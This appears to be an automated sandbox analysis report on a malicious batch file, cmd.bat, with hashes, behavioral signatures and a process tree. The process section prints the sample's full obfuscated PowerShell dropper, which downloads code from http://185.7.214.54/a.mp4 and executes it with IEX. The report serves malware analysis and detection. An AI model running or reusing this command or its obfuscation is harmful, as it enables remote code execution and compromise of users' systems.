Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 04:41
Static task
static1
Behavioral task
behavioral1
Sample
cmd.bat
Resource
win7-20240903-en
5 signatures
150 seconds
General
-
Target
cmd.bat
-
Size
179B
-
MD5
de7481e65ab0afc6d3928aeed6b20b7d
-
SHA1
9590ec1a379ae574c161aadc5ece66c185adb072
-
SHA256
89e11b195c89fc104208da51765503cc941c169ef118c8180d268dd1ecf8d096
-
SHA512
65ca342a1251c7954cc74877155afacc9d111b1039f3a773e07f5dcf6b98b76eb1147fd6091152f5ffd827b1bb4971d9d80c295bb744c2199c475d71f536cf67
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://185.7.214.54/a.mp4
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2764 powershell.exe -
pid Process 2764 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2764 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2656 wrote to memory of 2764 2656 cmd.exe 32 PID 2656 wrote to memory of 2764 2656 cmd.exe 32 PID 2656 wrote to memory of 2764 2656 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\cmd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$GR9='ject Net.WebCli';$KX4='loadString(''http://185.7.214.54/a.mp4'')';$GQ7='ent).Down';$IL3='(New-Ob';$TC=IEX ($IL3,$GR9,$GQ7,$KX4 -Join '')|IEX"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-